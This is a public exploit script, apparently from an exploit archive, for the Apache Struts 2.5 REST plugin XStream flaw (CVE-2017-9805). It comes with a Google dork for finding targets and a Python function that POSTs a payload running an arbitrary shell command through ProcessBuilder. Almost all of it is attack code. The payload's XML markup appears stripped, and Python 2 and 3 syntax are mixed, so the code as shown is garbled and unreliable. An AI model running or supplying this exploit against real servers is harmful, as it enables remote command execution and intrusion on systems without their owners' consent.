# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE # Google Dork: filetype:action # Date: 06/09/2017 # Exploit Author: Warflop # Vendor Homepage: https://struts.apache.org/ # Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip # Version: Struts 2.5 a Struts 2.5.12 # Tested on: Struts 2.5.10 # CVE : 2017-9805 #!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # Struts CVE-2017-9805 Exploit # Warflop (http://securityattack.com.br/) # Greetz: Pimps & G4mbl3r # ***************************************************** import requests import sys def exploration(command): exploit = ''' 0 false 0 /bin/sh-c'''+ command +''' false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''' url = sys.argv[1] headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0', 'Content-Type': 'application/xml'} request = requests.post(url, data=exploit, headers=headers) print request.text if len(sys.argv) < 3: print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE') print ('[*] Warflop - http://securityattack.com.br') print ('[*] Greatz: Pimps & G4mbl3r') print ('[*] Use: python struts2.py URL COMMAND') print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id') exit(0) else: exploration(sys.argv[2])